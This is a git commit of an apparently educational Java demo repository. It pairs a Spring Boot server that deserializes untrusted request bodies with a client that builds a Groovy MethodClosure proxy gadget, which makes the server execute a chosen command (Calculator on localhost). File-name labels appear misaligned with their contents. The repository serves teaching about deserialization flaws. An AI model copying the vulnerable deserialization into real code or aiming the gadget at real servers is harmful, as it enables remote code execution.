Demo is working and basic blog written

Author: mlmitch

README.md

@@ -1 +1,31 @@
-# java_security
+# Remote Code Execution for Java Developers
+
+NOTE: This is an educational repository with demo code. This code is NOT meant for production or deploying.
+
+Open `blog.md` for the writeup associated with this repo.
+
+###Running the Demo
+
+Running the server followed by running the client will result in the server being exploited.
+Note the code here only uses Java 8, but this example runs just fine on Java 11 - albeit with illegal reflective access warnings.
+Change the `COMMAND` string in `Client.java` to be the command you want the server to execute.
+It is currently set to the location of the calculator binary on MacOS. 
+
+Server:
+```shell
+cd $REPO_NAME/server
+mvn clean compile package
+java -jar ./target/server-0.0.1-SNAPSHOT.jar
+```
+
+Client:
+```shell
+cd $REPO_NAME/client
+mvn clean compile package
+java -jar ./target/client-0.0.1-SNAPSHOT.jar
+```
+
+Verify the server started calculator:
+```shell
+pstree -s "Calculator" | cat
+```

blog.md

@@ -0,0 +1,50 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>com.cisco.amp</groupId>
+    <artifactId>client</artifactId>
+    <packaging>jar</packaging>
+    <version>0.0.1-SNAPSHOT</version>
+
+    <properties>
+        <maven.compiler.target>1.8</maven.compiler.target>
+        <maven.compiler.source>1.8</maven.compiler.source>
+    </properties>
+
+    <parent>
+        <groupId>org.springframework.boot</groupId>
+        <artifactId>spring-boot-starter-parent</artifactId>
+        <version>2.1.3.RELEASE</version>
+    </parent>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-web</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>commons-io</groupId>
+            <artifactId>commons-io</artifactId>
+            <version>2.6</version>
+        </dependency>
+        <dependency>
+            <groupId>org.codehaus.groovy</groupId>
+            <artifactId>groovy-all</artifactId>
+            <version>2.4.0</version>
+        </dependency>
+    </dependencies>
+
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.springframework.boot</groupId>
+                <artifactId>spring-boot-maven-plugin</artifactId>
+            </plugin>
+        </plugins>
+    </build>
+
+</project>

client/pom.xml

@@ -0,0 +1,55 @@
+package com.cisco.amp.client;
+
+import com.cisco.amp.server.Submission;
+import org.codehaus.groovy.runtime.ConvertedClosure;
+import org.codehaus.groovy.runtime.MethodClosure;
+import org.springframework.http.HttpEntity;
+import org.springframework.http.ResponseEntity;
+import org.springframework.web.client.RestTemplate;
+
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Proxy;
+import java.util.ArrayList;
+import java.util.Collection;
+
+public class Client {
+
+    //Change this string to be the relevant calculator on your system or whatever you like
+    private static final String COMMAND = "/Applications/Calculator.app/Contents/MacOS/Calculator";
+
+    private static Collection<String> makeNiceCollection() {
+        Collection<String> niceCollection = new ArrayList<>();
+        niceCollection.add("Hello World!");
+        return niceCollection;
+    }
+
+    private static Collection<String> makeExploitCollection() {
+
+        //Create a mock collection with the reflection api that only implements iterator which we know will be called on the server
+
+        MethodClosure methodClosure = new MethodClosure(COMMAND, "execute");
+        ConvertedClosure iteratorHandler = new ConvertedClosure(methodClosure, "iterator");
+
+        Collection exploitCollection = (Collection) Proxy.newProxyInstance(
+                Client.class.getClassLoader(), new Class<?>[]{Collection.class}, iteratorHandler
+        );
+
+        return exploitCollection;
+    }
+
+    public static void main(String[] args) throws IOException {
+        //use makeNiceCollection or makeExploitCollection for normal or exploit operation respectively
+        Submission submission = new Submission(makeExploitCollection());
+
+        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
+        new ObjectOutputStream(byteArrayOutputStream).writeObject(submission);
+        byte[] bytes = byteArrayOutputStream.toByteArray();
+
+        HttpEntity<byte[]> entity = new HttpEntity<>(bytes);
+        RestTemplate restTemplate = new RestTemplate();
+        ResponseEntity<String> response = restTemplate.postForEntity("http://localhost:8080/submit", entity, String.class);
+        System.out.println(response.getBody());
+    }
+}

client/src/main/java/com/cisco/amp/client/Client.java

@@ -0,0 +1,29 @@
+package com.cisco.amp.server;
+
+import java.io.Serializable;
+import java.util.Collection;
+
+public class Submission implements Serializable {
+
+    private final Collection<String> values;
+
+    public Submission(Collection<String> values) {
+        this.values = values;
+    }
+
+    //Print out the collection - one entry on each line
+    @Override
+    public String toString() {
+        StringBuilder sb = new StringBuilder();
+
+        //This is where the exploitation happens
+        //Collection::iterator gets called for the for loop to iterate over the values
+        //This is done without properly validating the user input first
+        for (String entry : values) {
+            sb.append(entry);
+            sb.append("\n");
+        }
+
+        return sb.toString();
+    }
+}

client/src/main/java/com/cisco/amp/server/Submission.java

@@ -0,0 +1,50 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>com.cisco.amp</groupId>
+    <artifactId>server</artifactId>
+    <packaging>jar</packaging>
+    <version>0.0.1-SNAPSHOT</version>
+
+    <properties>
+        <maven.compiler.target>1.8</maven.compiler.target>
+        <maven.compiler.source>1.8</maven.compiler.source>
+    </properties>
+
+    <parent>
+        <groupId>org.springframework.boot</groupId>
+        <artifactId>spring-boot-starter-parent</artifactId>
+        <version>2.1.3.RELEASE</version>
+    </parent>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-web</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>commons-io</groupId>
+            <artifactId>commons-io</artifactId>
+            <version>2.6</version>
+        </dependency>
+        <dependency>
+            <groupId>org.codehaus.groovy</groupId>
+            <artifactId>groovy-all</artifactId>
+            <version>2.4.0</version>
+        </dependency>
+    </dependencies>
+
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.springframework.boot</groupId>
+                <artifactId>spring-boot-maven-plugin</artifactId>
+            </plugin>
+        </plugins>
+    </build>
+
+</project>

server/pom.xml

@@ -0,0 +1,13 @@
+package com.cisco.amp.server;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class Server {
+
+    public static void main(String[] args) {
+        SpringApplication.run(Server.class, args);
+    }
+
+}

server/src/main/java/com/cisco/amp/server/Server.java

@@ -0,0 +1,29 @@
+package com.cisco.amp.server;
+
+import java.io.Serializable;
+import java.util.Collection;
+
+public class Submission implements Serializable {
+
+    private final Collection<String> values;
+
+    public Submission(Collection<String> values) {
+        this.values = values;
+    }
+
+    //Print out the collection - one entry on each line
+    @Override
+    public String toString() {
+        StringBuilder sb = new StringBuilder();
+
+        //This is where the exploitation happens
+        //Collection::iterator gets called for the for loop to iterate over the values
+        //This is done without properly validating the user input first
+        for (String entry : values) {
+            sb.append(entry);
+            sb.append("\n");
+        }
+
+        return sb.toString();
+    }
+}

server/src/main/java/com/cisco/amp/server/Submission.java

@@ -0,0 +1,27 @@
+package com.cisco.amp.server;
+
+import org.apache.commons.io.IOUtils;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import javax.servlet.http.HttpServletRequest;
+import java.io.ByteArrayInputStream;
+import java.io.IOException;
+import java.io.ObjectInputStream;
+
+@RestController
+public class SubmissionController {
+
+
+    @PostMapping("/submit")
+    public String submit(HttpServletRequest requestEntity) throws IOException, ClassNotFoundException {
+
+        //extract the bytes and deserialize them
+        byte[] bytes = IOUtils.toByteArray(requestEntity.getInputStream());
+        ObjectInputStream stream = new ObjectInputStream(new ByteArrayInputStream(bytes));
+        Submission submission = (Submission) stream.readObject();
+
+        return submission.toString();
+    }
+
+}